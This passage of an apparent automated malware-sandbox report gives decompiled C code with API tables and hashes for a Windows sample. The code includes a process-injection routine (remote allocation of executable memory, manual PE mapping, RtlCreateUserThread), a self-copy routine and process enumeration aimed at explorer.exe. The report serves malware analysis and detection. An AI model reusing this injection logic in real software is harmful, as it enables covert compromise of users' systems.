				void* _v24;
				long _v28;
				CHAR* _v32;
				struct HINSTANCE__* _v36;
				long* _v40;
				long _v44;
				void* _v48;
				long _v52;
				void* _v56;
				long _v60;
				long _v64;
				long _v68;
				long _v72;
				long _v76;
				void* _v80;
				long* _t104;
				long _t111;
				void* _t114;
				void* _t116;
				void* _t117;
				void* _t118;
				CHAR* _t128;
				signed short _t131;
				CHAR* _t133;
				_Unknown_base(*)()* _t134;
				long* _t135;
				intOrPtr _t136;
				CHAR* _t137;
				long* _t140;
				CHAR* _t141;
				CHAR* _t146;
				long _t148;
				CHAR* _t149;
				CHAR* _t160;
				long _t163;
				CHAR** _t164;
				void* _t167;
				void* _t169;
				void* _t172;
				struct HINSTANCE__* _t175;
				void* _t176;
				signed int _t177;
				CHAR* _t179;
				signed int _t184;
				CHAR* _t187;
				_Unknown_base(*)()** _t189;
				void* _t191;
				CHAR* _t192;
				CHAR* _t194;
				long* _t195;
				void* _t197;
				signed short* _t198;
				CHAR** _t200;
				long _t201;
				void* _t203;
				void* _t204;

				_t172 = __ecx;
				_t104 = _a20;
				_t185 = _a4;
				_v8 = 0;
				_v16 = 0;
				_v12 = 0;
				_v24 = 0;
				_v28 = 0;
				_v20 = 0;
				_v48 = 0;
				_v44 = 0;
				 *_t104 = 0;
				RtlImageNtHeader(_a4);
				_t195 = _t104;
				_v40 = _t195;
				if( *_t195 != 0x4550) {
					L5:
					return 0;
				} else {
					_v28 = _t195[0x14];
					_v56 = _a8;
					_v80 = 0x18;
					_v76 = 0;
					_v68 = 0;
					_v72 = 0;
					_v64 = 0;
					_v60 = 0;
					_v52 = 0;
					_t111 = NtOpenProcess( &_v8, 0x1fffff,  &_v80,  &_v56);
					if(_t111 != 0) {
						goto L5;
					} else {
						if( *0x5d1314 == _t111) {
							L6:
							_t114 = NtAllocateVirtualMemory(_v8,  &_v12, 0,  &_v28, 0x3000, 0x40); // executed
							__eflags = _t114;
							if(_t114 != 0) {
								goto L4;
							} else {
								_t116 = VirtualAlloc(_t114, _v28, 0x3000, 0x40); // executed
								_t169 = _t116;
								__eflags = _t169;
								if(_t169 == 0) {
									L43:
									__eflags = _v12;
									if(_v12 != 0) {
										 *0x5d10ac(_v8,  &_v12,  &_v20, 0x8000);
									}
									_t117 = _v8;
									__eflags = _t117;
									if(_t117 != 0) {
										NtClose(_t117);
										_t117 = _v8;
									}
									__eflags = _t169;
									if(_t169 != 0) {
										VirtualFree(_t169, 0, 0x8000);
										_t117 = _v8;
									}
									__eflags = _v24;
									_v20 = 0;
									if(_v24 != 0) {
										 *0x5d10ac(_t117,  &_v24,  &_v20, 0x8000);
									}
									_t118 = _v16;
									__eflags = _t118;
									if(_t118 != 0) {
										NtClose(_t118);
									}
									__eflags = 0;
									return 0;
								} else {
									E00401640(_t169, _t185, _v28);
									_t204 = _t203 + 0xc;
									_t187 = _t169 + _t195[0x20];
									__eflags = _t187;
									while(1) {
										_t128 = _t187[0xc];
										_v32 = _t187;
										__eflags = _t128;
										if(_t128 != 0) {
											goto L11;
										}
										__eflags = _t187[4] - _t128;
										if(_t187[4] == _t128) {
											_t135 = _v40;
											_t176 = _v12;
											_t191 = _a4;
											_t45 = _t135 + 0xa0; // 0x45dd842a
											_t46 = _t135 + 0x34; // 0x0
											_t136 =  *_t46;
											_t200 =  *_t45 + _t169;
											_v40 = _t176 - _t136;
											__eflags =  *_t200;
											_v36 = _t191 - _t136;
											if( *_t200 != 0) {
												do {
													_t192 = _t200[1];
													_t50 =  &(_t200[1]); // 0x45dd842e
													_t164 = _t50;
													_v32 = _t164;
													__eflags = _t192 - 8;
													if(_t192 >= 8) {
														_t184 = 0;
														_t194 =  &(_t192[0xfffffffffffffff8]) >> 1;
														__eflags = _t194;
														if(_t194 != 0) {
															asm("o16 nop [eax+eax]");
															do {
																_t177 =  *(_t200 + 8 + _t184 * 2) & 0x0000ffff;
																__eflags = _t177;
																if(_t177 != 0) {
																	_t179 =  &(( *_t200)[_t177 & 0x00000fff]);
																	_t57 =  &(_t179[_t169]);
																	 *_t57 = _t179[_t169] + _v40 - _v36;
																	__eflags =  *_t57;
																}
																_t184 = _t184 + 1;
																__eflags = _t184 - _t194;
															} while (_t184 < _t194);
															_t164 = _v32;
														}
													}
													_t200 = _t200 +  *_t164;
													__eflags =  *_t200;
												} while ( *_t200 != 0);
												_t176 = _v12;
												_t191 = _a4;
											}
											_t137 = NtWriteVirtualMemory(_v8, _t176, _t169, _v28, 0); // executed
											__eflags = _t137;
											if(_t137 < 0) {
												goto L43;
											} else {
												_t201 = _a16;
												_t140 = NtAllocateVirtualMemory(_v8,  &_v24, 0,  &_a16, 0x3000, 4); // executed
												__eflags = _t140;
												if(_t140 != 0) {
													goto L43;
												} else {
													_t141 = NtWriteVirtualMemory(_v8, _v24, _a12, _t201, _t140); // executed
													__eflags = _t141;
													if(_t141 < 0) {
														goto L43;
													} else {
														_t146 = RtlCreateUserThread(_v8, 0, 0, 0, 0, 0, _v12 - _t191 + _a24, _v24,  &_v16, 0); // executed
														__eflags = _t146;
														if(_t146 < 0) {
															goto L43;
														} else {
															asm("xorps xmm0, xmm0");
															asm("movlpd [ebp-0x2c], xmm0");
															_t148 = NtWaitForSingleObject(_v16, 0,  &_v48);
															__eflags = _t148 - 0x102;
															if(_t148 == 0x102) {
																while(1) {
																	_t160 =  *0x5d2118; // 0x0
																	__eflags = _t160;
																	if(_t160 != 0) {
																		break;
																	}
																	Sleep(0xbb8); // executed
																	_t163 = NtWaitForSingleObject(_v16, 0,  &_v48);
																	__eflags = _t163 - 0x102;
																	if(_t163 == 0x102) {
																		continue;
																	} else {
																	}
																	goto L41;
																}
																TerminateThread(_v16, 0);
															}
															L41:
															_t149 = GetExitCodeThread(_v16, _a20);
															__eflags = _t149;
															if(_t149 == 0) {
																goto L43;
															} else {
																NtClose(_v16);
																 *0x5d10ac(_v8,  &_v12,  &_v20, 0x8000);
																NtClose(_v8);
																VirtualFree(_t169, 0, 0x8000);
																_v20 = 0;
																 *0x5d10ac(_v8,  &_v24,  &_v20, 0x8000);
																return 1;
															}
														}
													}
												}
											}
										} else {
											goto L11;
										}
										goto L54;
										L11:
										_t175 = E00408B00( &(_t128[_t169]));
										_t204 = _t204 + 4;
										_v36 = _t175;
										__eflags = _t175;
										if(_t175 == 0) {
											goto L43;
										} else {
											_t197 = _t169 +  *_t187;
											_t189 = _t169 + _t187[0x10];
											__eflags = _t197 - _t169;
											_t198 =  ==  ? _t189 : _t197;
											__eflags = _t198 - _t169;
											if(_t198 == _t169) {
												goto L43;
											} else {
												_t131 =  *_t198;
												__eflags = _t131;
												if(__eflags == 0) {
													L19:
													_t187 =  &(_v32[0x14]);
													continue;
												} else {
													L14:
													L14:
													if(__eflags >= 0) {
														_t133 = _t131 + 2 + _t169;
														__eflags = _t133;
													} else {
														_t133 = _t131 & 0x0000ffff;
													}
													_t134 = GetProcAddress(_t175, _t133);
													 *_t189 = _t134;
													__eflags = _t134;
													if(_t134 == 0) {
														goto L43;
													}
													_t131 = _t198[2];
													_t198 =  &(_t198[2]);
													_t175 = _v36;
													_t189 = _t189 + 4;
													__eflags = _t131;
													if(__eflags != 0) {
														goto L14;
													} else {
														goto L19;
													}
												}
											}
										}
										goto L54;
									}
								}
							}
						} else {
							_t167 = E00408270(_t172, _v8);
							_t203 = _t203 + 4;
							if(_t167 != 0) {
								goto L6;
							} else {
								L4:
								NtClose(_v8);
								goto L5;
							}
						}
					}
				}
				L54:
			}

0x004029e0
0x004029e6
0x004029eb
0x004029ef
0x004029f6
0x004029fd
0x00402a04
0x00402a0b
0x00402a12
0x00402a19
0x00402a20
0x00402a27
0x00402a2d
0x00402a33
0x00402a35
0x00402a3e
0x00402ab9
0x00402abf
0x00402a40
0x00402a43
0x00402a49
0x00402a53
0x00402a63
0x00402a6b
0x00402a72
0x00402a79
0x00402a80
0x00402a87
0x00402a8e
0x00402a96
0x00000000
0x00402a98
0x00402a9e
0x00402ac0
0x00402ad4
0x00402ada
0x00402adc
0x00000000
0x00402ade
0x00402aea
0x00402af0
0x00402af2
0x00402af4
0x00402d49
0x00402d49
0x00402d4d
0x00402d5f
0x00402d5f
0x00402d65
0x00402d68
0x00402d6a
0x00402d6d
0x00402d73
0x00402d73
0x00402d76
0x00402d78
0x00402d82
0x00402d88
0x00402d88
0x00402d8b
0x00402d8f
0x00402d96
0x00402da6
0x00402da6
0x00402dac
0x00402daf
0x00402db1
0x00402db4
0x00402db4
0x00402dbc
0x00402dc2
0x00402afa
0x00402aff
0x00402b0a
0x00402b0d
0x00402b0d
0x00402b0f
0x00402b0f
0x00402b12
0x00402b15
0x00402b17
0x00000000
0x00000000
0x00402b19
0x00402b1c
0x00402b88
0x00402b8b
0x00402b90
0x00402b93
0x00402b99
0x00402b99
0x00402b9c
0x00402ba0
0x00402ba7
0x00402baa
0x00402bad
0x00402bb0
0x00402bb0
0x00402bb3
0x00402bb3
0x00402bb6
0x00402bb9
0x00402bbc
0x00402bc1
0x00402bc6
0x00402bc6
0x00402bc8
0x00402bca
0x00402bd0
0x00402bd0
0x00402bd5
0x00402bd8
0x00402be3
0x00402be8
0x00402be8
0x00402be8
0x00402be8
0x00402beb
0x00402bec
0x00402bec
0x00402bf0
0x00402bf0
0x00402bc8
0x00402bf3
0x00402bf5
0x00402bf5
0x00402bfa
0x00402bfd
0x00402bfd
0x00402c0a
0x00402c10
0x00402c12
0x00000000
0x00402c18
0x00402c18
0x00402c2f
0x00402c35
0x00402c37
0x00000000
0x00402c3d
0x00402c48
0x00402c4e
0x00402c50
0x00000000
0x00402c56
0x00402c75
0x00402c7b
0x00402c7d
0x00000000
0x00402c83
0x00402c86
0x00402c8f
0x00402c94
0x00402c9a
0x00402c9f
0x00402ca7
0x00402ca7
0x00402cac
0x00402cae
0x00000000
0x00000000
0x00402cb5
0x00402cc0
0x00402cc6
0x00402ccb
0x00000000
0x00000000
0x00402ccd
0x00000000
0x00402ccb
0x00402cd4
0x00402cd4
0x00402cda
0x00402ce0
0x00402ce6
0x00402ce8
0x00000000
0x00402cea
0x00402ced
0x00402d03
0x00402d0c
0x00402d1a
0x00402d28
0x00402d37
0x00402d48
0x00402d48
0x00402ce8
0x00402c7d
0x00402c50
0x00402c37
0x00000000
0x00000000
0x00000000
0x00000000
0x00402b1e
0x00402b26
0x00402b28
0x00402b2b
0x00402b2e
0x00402b30
0x00000000
0x00402b36
0x00402b3b
0x00402b3d
0x00402b3f
0x00402b41
0x00402b44
0x00402b46
0x00000000
0x00402b4c
0x00402b4c
0x00402b4e
0x00402b50
0x00402b80
0x00402b83
0x00000000
0x00402b52
0x00000000
0x00402b52
0x00402b52
0x00402b5c
0x00402b5c
0x00402b54
0x00402b54
0x00402b54
0x00402b60
0x00402b66
0x00402b68
0x00402b6a
0x00000000
0x00000000
0x00402b70
0x00402b73
0x00402b76
0x00402b79
0x00402b7c
0x00402b7e
0x00000000
0x00000000
0x00000000
0x00000000
0x00402b7e
0x00402b50
0x00402b46
0x00000000
0x00402b30
0x00402b0f
0x00402af4
0x00402aa0
0x00402aa3
0x00402aa8
0x00402aad
0x00000000
0x00402aaf
0x00402aaf
0x00402ab2
0x00000000
0x00402ab2
0x00402aad
0x00402a9e
0x00402a96
0x00000000

APIs

RtlImageNtHeader.NTDLL(?), ref: 00402A2D
NtOpenProcess.NTDLL(00000000,001FFFFF,?,?), ref: 00402A8E
NtClose.NTDLL(00000000), ref: 00402AB2
NtAllocateVirtualMemory.NTDLL(00000000,00000000,00000000,00000000,00003000,00000040), ref: 00402AD4
VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040,00000000), ref: 00402AEA
GetProcAddress.KERNEL32(00000000,-00000002), ref: 00402B60
NtWriteVirtualMemory.NTDLL(00000000,00000000,00000000,00000000,00000000), ref: 00402C0A
NtAllocateVirtualMemory.NTDLL(00000000,00000000,00000000,00000000,00003000,00000004), ref: 00402C2F
NtWriteVirtualMemory.NTDLL(00000000,00000000,00000000,00000000,00000000), ref: 00402C48
RtlCreateUserThread.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00402C75
NtWaitForSingleObject.NTDLL(00000000,00000000,00000000), ref: 00402C94
Sleep.KERNELBASE(00000BB8), ref: 00402CB5
NtWaitForSingleObject.NTDLL(00000000,00000000,00000000), ref: 00402CC0
TerminateThread.KERNEL32(00000000,00000000), ref: 00402CD4
GetExitCodeThread.KERNEL32(00000000,00000000), ref: 00402CE0
NtClose.NTDLL(00000000), ref: 00402CED
NtFreeVirtualMemory.NTDLL(00000000,00000000,00000000,00008000), ref: 00402D03
NtClose.NTDLL(00000000), ref: 00402D0C

Part of subcall function 00408270: GetModuleHandleW.KERNEL32(kernel32,IsWow64Process,?,?,00403432), ref: 00408285
Part of subcall function 00408270: GetProcAddress.KERNEL32(00000000), ref: 0040828C

VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00402D1A
NtFreeVirtualMemory.NTDLL(00000000,00000000,00000000,00008000), ref: 00402D37
NtFreeVirtualMemory.NTDLL(00000000,00000000,00000000,00008000), ref: 00402D5F
NtClose.NTDLL(00000000), ref: 00402D6D
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00402D82
NtFreeVirtualMemory.NTDLL(00000000,00000000,00000000,00008000), ref: 00402DA6
NtClose.NTDLL(00000000), ref: 00402DB4

Memory Dump Source

Source File: 0000000D.00000002.908233693.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Virtual$Memory$Free$Close$Thread$AddressAllocateObjectProcSingleWaitWrite$AllocCodeCreateExitHandleHeaderImageModuleOpenProcessSleepTerminateUser
String ID:
API String ID: 4217436290-0
Opcode ID: 4a900b3df5d8d8e8cb2b3ece97f72b44356a237bbd3b48ae2c28c37453d27ef7
Instruction ID: aa250f91bc0df1c709c0f0294cc1af27058bb64088126e2459afa89f473692c1
Opcode Fuzzy Hash: 4a900b3df5d8d8e8cb2b3ece97f72b44356a237bbd3b48ae2c28c37453d27ef7
Instruction Fuzzy Hash: 53C14C71A01209EFDB20DF95DD49BEEBBB9FF04300F14406AE905B6290D775AE44DB98

Uniqueness

Uniqueness Score: -1.00%

Function 00406340, Relevance: 35.2, APIs: 19, Strings: 1, Instructions: 206
nativefilememoryCOMMON

Download Yara Rule

C-Code - Quality: 42%

			E00406340(intOrPtr _a4) {
				void* _v8;
				void* _v12;
				long _v16;
				long _v20;
				long _v24;
				long _v28;
				long _v32;
				void* _v36;
				long _v40;
				long _v44;
				intOrPtr _v48;
				char* _v52;
				long _v56;
				void* _v60;
				long _v64;
				void* _v68;
				char _v76;
				char _v84;
				short _v1108;
				long _t59;
				long _t69;
				long* _t70;
				void* _t71;
				void* _t74;
				long _t83;
				signed int _t85;
				void* _t90;
				void* _t109;

				_v8 = 0;
				asm("xorps xmm0, xmm0");
				_v12 = 0;
				_v60 = 0;
				asm("movups [ebp-0x34], xmm0");
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v28 = 0;
				_v24 = 0;
				_v20 = 0;
				_v16 = 0;
				_v68 = 0;
				_v64 = 0;
				asm("movq [ebp-0x48], xmm0");
				asm("movq [ebp-0x50], xmm0");
				_t59 = GetModuleFileNameW(0,  &_v1108, 0x200);
				if(_t59 == 0 || _t59 == 0x200) {
					L6:
					return 0;
				} else {
					_push(0);
					_push(0);
					_push( &_v76);
					_push( &_v1108);
					if( *0x5d10b8() != 1) {
						goto L6;
					} else {
						_v60 = 0x18;
						_v52 =  &_v76;
						_v56 = 0;
						_v48 = 0x40;
						_v44 = 0;
						_v40 = 0;
						_t69 = NtCreateFile( &_v8, 0x120089,  &_v60,  &_v36,  &_v68, 0x80, 3, 1, 0x60, 0, 0); // executed
						if(_t69 != 0) {
							goto L6;
						} else {
							_t70 =  &_v28;
							__imp__GetFileSizeEx(_v8, _t70);
							if(_t70 != 0) {
								_t71 = VirtualAlloc(0, _v28, 0x3000, 4); // executed
								_t109 = _t71;
								if(_t109 != 0) {
									_t74 =  *0x5d10bc(_v8, 0, 0, 0,  &_v36, _t109, _v28,  &_v20, 0); // executed
									if(_t74 == 0) {
										NtClose(_v8); // executed
										_t104 = _a4;
										_push(0);
										_push(0);
										_push( &_v84);
										_push(_a4);
										if( *0x5d10b8() == 1) {
											_v60 = 0x18;
											_v52 =  &_v84;
											_v56 = 0;
											_v48 = 0x40;
											_v44 = 0;
											_v40 = 0;
											_t83 = NtCreateFile( &_v12, 0x120116,  &_v60,  &_v36,  &_v68, 0x80, 0, 0, 0x60, 0, 0); // executed
											if(_t83 != 0) {
												L16:
												VirtualFree(_t109, 0, 0x8000);
												_t85 = E00407ED0(_t104);
												asm("sbb eax, eax");
												return  ~( ~_t85);
											} else {
												_v20 = _t83;
												_v16 = _t83;
												_t90 =  *0x5d10c0(_v12, 0, 0, 0,  &_v36, _t109, _v28,  &_v20, _t83); // executed
												_push(_v12);
												if(_t90 == 0) {
													NtClose();
													VirtualFree(_t109, 0, 0x8000); // executed
													return 1;
												} else {
													NtClose();
													goto L16;
												}
											}
										} else {
											VirtualFree(_t109, 0, 0x8000);
											return 0;
										}
									} else {
										NtClose(_v8);
										VirtualFree(_t109, 0, 0x8000);
										return 0;
									}
								} else {
									NtClose(_v8);
									return 0;
								}
							} else {
								NtClose(_v8);
								goto L6;
							}
						}
					}
				}
			}

0x00406354
0x0040635b
0x0040635e
0x00406368
0x0040636f
0x00406373
0x0040637a
0x00406381
0x00406388
0x0040638f
0x00406396
0x0040639d
0x004063a4
0x004063ab
0x004063b2
0x004063b7
0x004063bc
0x004063c4
0x0040645f
0x00406464
0x004063d5
0x004063d5
0x004063d7
0x004063dc
0x004063e3
0x004063ec
0x00000000
0x004063ee
0x00406400
0x00406407
0x00406411
0x0040641c
0x0040642c
0x00406434
0x0040643b
0x00406443
0x00000000
0x00406445
0x00406445
0x0040644c
0x00406454
0x00406472
0x00406478
0x0040647c
0x004064a5
0x004064ad
0x004064d1
0x004064d7
0x004064dd
0x004064df
0x004064e1
0x004064e2
0x004064eb
0x00406515
0x0040651c
0x00406526
0x00406531
0x00406541
0x00406549
0x00406550
0x00406558
0x00406589
0x00406591
0x00406598
0x004065a2
0x004065ab
0x0040655a
0x0040655b
0x0040655e
0x00406576
0x0040657c
0x00406581
0x004065ac
0x004065ba
0x004065ca
0x00406583
0x00406583
0x00000000
0x00406583
0x00406581
0x004064ed
0x004064f5
0x00406502
0x00406502
0x004064af
0x004064b2
0x004064c0
0x004064cc
0x004064cc
0x0040647e
0x00406481
0x0040648d
0x0040648d
0x00406456
0x00406459
0x00000000
0x00406459
0x00406454
0x00406443
0x004063ec

APIs

GetModuleFileNameW.KERNEL32(00000000,?,00000200), ref: 004063BC
RtlDosPathNameToNtPathName_U.NTDLL(?,?,00000000,00000000), ref: 004063E4
NtCreateFile.NTDLL(00000000,00120089,00000018,00000000,00000000,00000080,00000003,00000001,00000060,00000000,00000000), ref: 0040643B
GetFileSizeEx.KERNEL32(00000000,00000000), ref: 0040644C
NtClose.NTDLL(00000000), ref: 00406459
VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000004,?), ref: 00406472
NtClose.NTDLL(00000000), ref: 00406481
NtReadFile.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004064A5
NtClose.NTDLL(00000000), ref: 004064B2
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004064C0
NtClose.NTDLL(00000000), ref: 004064D1
RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 004064E3
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 004064F5
NtCreateFile.NTDLL(00000000,00120116,00000018,00000000,00000000,00000080,00000000,00000000,00000060,00000000,00000000), ref: 00406550
NtWriteFile.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00406576
NtClose.NTDLL(00000000), ref: 00406583
VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00406591
NtClose.NTDLL(00000000), ref: 004065AC
VirtualFree.KERNELBASE(00000000,00000000,00008000), ref: 004065BA

Strings

@, xrefs: 00406531

Memory Dump Source

Source File: 0000000D.00000002.908233693.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseFile$Virtual$FreePath$Name$CreateName_$AllocModuleReadSizeWrite
String ID: @
API String ID: 1655568127-2766056989
Opcode ID: e18825e1e8f1edecaee0ecfc773bdb3614a0eca66b86556126c1a6f2c5aeab46
Instruction ID: 2fd8ed99f3ae58de8391e8baf5aa5f6abea6aa1d3bd579213be14ba4813b3cc0
Opcode Fuzzy Hash: e18825e1e8f1edecaee0ecfc773bdb3614a0eca66b86556126c1a6f2c5aeab46
Instruction Fuzzy Hash: B4715A71A4121CBBEB209F90DC49BEEBBB8FB08704F100126F605F62D0D7B55A588B99

Uniqueness

Uniqueness Score: -1.00%

Function 00408B20, Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 152
encryptionfileCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E00408B20(char _a4, intOrPtr _a8) {
				long* _v8;
				int _v12;
				long _v16;
				int _v20;
				char _v24;
				char _v56;
				void _v1080;
				char _t39;
				void* _t40;
				long** _t42;
				int* _t43;
				int _t46;
				char* _t51;
				void* _t60;
				intOrPtr* _t69;
				int _t70;
				long _t72;
				signed int _t73;
				signed int _t75;
				intOrPtr _t80;
				void* _t82;
				void* _t87;

				asm("movups xmm0, [0x40aa14]");
				_t39 =  *0x40aa24; // 0x0
				_t1 =  &_a4; // 0x40363e
				_v8 = 0;
				_v12 = 0;
				_v16 = 0;
				_v20 = 0;
				asm("movups [ebp-0x24], xmm0");
				_v24 = _t39;
				_t40 = CreateFileW( *_t1, 0x80000000, 1, 0, 3, 0x8000000, 0); // executed
				_t82 = _t40;
				if(_t82 == 0xffffffff) {
					L3:
					return 0;
				} else {
					_t42 =  &_v8;
					__imp__CryptAcquireContextW(_t42, 0, 0, 1, 0xf0000000); // executed
					if(_t42 != 0) {
						_t43 =  &_v12;
						__imp__CryptCreateHash(_v8, 0x8003, 0, 0, _t43); // executed
						if(_t43 != 0) {
							_t46 = ReadFile(_t82,  &_v1080, 0x400,  &_v16, 0); // executed
							if(_t46 == 0) {
								L11:
								_push(0);
								goto L12;
							} else {
								_t69 = __imp__CryptHashData;
								while(1) {
									_t72 = _v16;
									if(_t72 == 0) {
										break;
									}
									_t60 =  *_t69(_v12,  &_v1080, _t72, 0);
									_push(0);
									if(_t60 == 0) {
										L12:
										CryptReleaseContext(_v8);
										__imp__CryptDestroyHash(_v12);
										CloseHandle(_t82);
										L13:
										return 0;
									} else {
										_t46 = ReadFile(_t82,  &_v1080, 0x400,  &_v16, ??); // executed
										if(_t46 != 0) {
											continue;
										} else {
											goto L11;
										}
									}
									goto L20;
								}
								if(_t46 == 0) {
									goto L11;
								} else {
									_v20 = 0x10;
									_t51 =  &_v56;
									__imp__CryptGetHashParam(_v12, 2, _t51,  &_v20, 0);
									if(_t51 == 0) {
										goto L13;
									} else {
										_t70 = _v20;
										_t75 = 0;
										if(_t70 != 0) {
											_t80 = _a8;
											asm("o16 nop [eax+eax]");
											do {
												_t73 =  *(_t87 + _t75 - 0x34) & 0x000000ff;
												 *((char*)(_t80 + _t75 * 2)) =  *(_t87 + (_t73 >> 4) - 0x24) & 0x000000ff;
												 *((char*)(_t80 + 1 + _t75 * 2)) =  *(_t87 + (_t73 & 0x0000000f) - 0x24) & 0x000000ff;
												_t75 = _t75 + 1;
											} while (_t75 < _t70);
										}
										__imp__CryptDestroyHash(_v12);
										CryptReleaseContext(_v8, 0);
										FindCloseChangeNotification(_t82); // executed
										return 1;
									}
								}
							}
						} else {
							CloseHandle(_t82);
							CryptReleaseContext(_v8, 0);
							return 0;
						}
					} else {
						CloseHandle(_t82);
						goto L3;
					}
				}
				L20:
			}

0x00408b29
0x00408b30
0x00408b48
0x00408b4b
0x00408b52
0x00408b59
0x00408b60
0x00408b67
0x00408b6b
0x00408b6e
0x00408b74
0x00408b79
0x00408b9b
0x00408ba1
0x00408b7b
0x00408b86
0x00408b8a
0x00408b92
0x00408ba2
0x00408bb2
0x00408bba
0x00408bf0
0x00408bf4
0x00408c33
0x00408c33
0x00000000
0x00408bf6
0x00408bf6
0x00408c00
0x00408c00
0x00408c05
0x00000000
0x00000000
0x00408c14
0x00408c16
0x00408c1a
0x00408c35
0x00408c38
0x00408c41
0x00408c48
0x00408c4e
0x00408c56
0x00408c1c
0x00408c2d
0x00408c31
0x00000000
0x00000000
0x00000000
0x00000000
0x00408c31
0x00000000
0x00408c1a
0x00408c59
0x00000000
0x00408c5b
0x00408c60
0x00408c68
0x00408c71
0x00408c79
0x00000000
0x00408c7b
0x00408c7b
0x00408c7e
0x00408c82
0x00408c84
0x00408c87
0x00408c90
0x00408c90
0x00408ca2
0x00408caa
0x00408cae
0x00408caf
0x00408c90
0x00408cb6
0x00408cc1
0x00408cc8
0x00408cd9
0x00408cd9
0x00408c79
0x00408c59
0x00408bbc
0x00408bbd
0x00408bc8
0x00408bd4
0x00408bd4
0x00408b94
0x00408b95
0x00000000
0x00408b95
0x00408b92
0x00000000

APIs

CreateFileW.KERNELBASE(>6@,80000000,00000001,00000000,00000003,08000000,00000000), ref: 00408B6E
CryptAcquireContextW.ADVAPI32(00000000,00000000,00000000,00000001,F0000000), ref: 00408B8A
CloseHandle.KERNEL32(00000000), ref: 00408B95
CryptCreateHash.ADVAPI32(00000000,00008003,00000000,00000000,00000000), ref: 00408BB2
CloseHandle.KERNEL32(00000000), ref: 00408BBD
CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 00408BC8
ReadFile.KERNELBASE(00000000,?,00000400,00000000,00000000,?,00000000), ref: 00408BF0
CryptHashData.ADVAPI32(00000000,?,00000000,00000000,?,00000000), ref: 00408C14
ReadFile.KERNELBASE(00000000,?,00000400,00000000,00000000,?,00000000), ref: 00408C2D
CryptReleaseContext.ADVAPI32(00000000,00000000,?,00000000), ref: 00408C38
CryptDestroyHash.ADVAPI32(00000000,?,00000000), ref: 00408C41
CloseHandle.KERNEL32(00000000,?,00000000), ref: 00408C48
CryptGetHashParam.ADVAPI32(00000000,00000002,?,00000000,00000000,?,00000000), ref: 00408C71
CryptDestroyHash.ADVAPI32(00000000,?,00000000), ref: 00408CB6
CryptReleaseContext.ADVAPI32(00000000,00000000,?,00000000), ref: 00408CC1
FindCloseChangeNotification.KERNELBASE(00000000,?,00000000), ref: 00408CC8

Strings

>6@, xrefs: 00408B48

Memory Dump Source

Source File: 0000000D.00000002.908233693.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Crypt$Hash$CloseContext$FileHandleRelease$CreateDestroyRead$AcquireChangeDataFindNotificationParam
String ID: >6@
API String ID: 2963825918-779403629
Opcode ID: 873b0d2445dc433d4259a9d3bd515c7c99b398111595db81251911ace00b2671
Instruction ID: c20e288969fc02838bc95c2aa2b6e857bba7efe27eb6bc48cd55eb8ba344291c
Opcode Fuzzy Hash: 873b0d2445dc433d4259a9d3bd515c7c99b398111595db81251911ace00b2671
Instruction Fuzzy Hash: 2751B271A01219BBEB209FA4DE45FEE7BB8EF48300F104075FA44B51E1DB75AE458B68

Uniqueness

Uniqueness Score: -1.00%

Function 004080E0, Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 130
libraryprocessloaderCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E004080E0(void* __ebx, void* __edi, void* __esi, char _a4, intOrPtr* _a8, intOrPtr _a12) {
				void* _v8;
				struct HINSTANCE__* _v12;
				char _v272;
				intOrPtr _v300;
				void* _v308;
				void* _t30;
				struct HINSTANCE__* _t31;
				void* _t34;
				int _t37;
				struct HINSTANCE__* _t39;
				int _t45;
				void* _t49;
				void* _t51;
				void* _t55;
				void* _t57;
				void* _t61;
				intOrPtr* _t62;
				intOrPtr* _t66;
				signed int _t69;
				void* _t72;

				if(_a4 == 0) {
					return E00407EF0("explorer.exe");
				} else {
					_t69 = 0;
					_v308 = 0x128;
					_a4 = 0;
					_t30 = CreateToolhelp32Snapshot(2, 0); // executed
					_t61 = _t30;
					_v8 = _t61;
					if(_t61 != 0xffffffff) {
						_t66 = 0;
						_t31 = LoadLibraryA("kernel32.dll");
						_v12 = _t31;
						if(_t31 != 0) {
							_t66 = GetProcAddress(_t31, "ProcessIdToSessionId");
						}
						Process32First(_t61,  &_v308); // executed
						_t34 = E00408DD0();
						_t62 = _a8;
						if(_t34 == 0 || _t66 == 0) {
							L10:
							_t69 = 1;
							 *_t62 = _v300;
						} else {
							 *_t66(_v300,  &_a4);
							if(_a4 != _t69) {
								_t55 = E00401740("csrss.exe",  &_v272);
								_t72 = _t72 + 8;
								if(_t55 != 0) {
									_t57 = E00401740("winlogon.exe",  &_v272);
									_t72 = _t72 + 8;
									if(_t57 != 0) {
										goto L10;
									}
								}
							}
						}
						_t37 = Process32Next(_v8,  &_v308); // executed
						if(_t37 != 0) {
							do {
								if(E00408DD0() == 0 || _t66 == 0) {
									L18:
									 *((intOrPtr*)(_t62 + _t69 * 4)) = _v300;
									_t69 = _t69 + 1;
									if(_t69 < _a12) {
										goto L19;
									}
								} else {
									 *_t66(_v300,  &_a4); // executed
									if(_a4 == 0) {
										goto L19;
									} else {
										_t49 = E00401740("csrss.exe",  &_v272);
										_t72 = _t72 + 8;
										if(_t49 == 0) {
											goto L19;
										} else {
											_t51 = E00401740("winlogon.exe",  &_v272);
											_t72 = _t72 + 8;
											if(_t51 == 0) {
												goto L19;
											} else {
												goto L18;
											}
										}
									}
								}
								goto L20;
								L19:
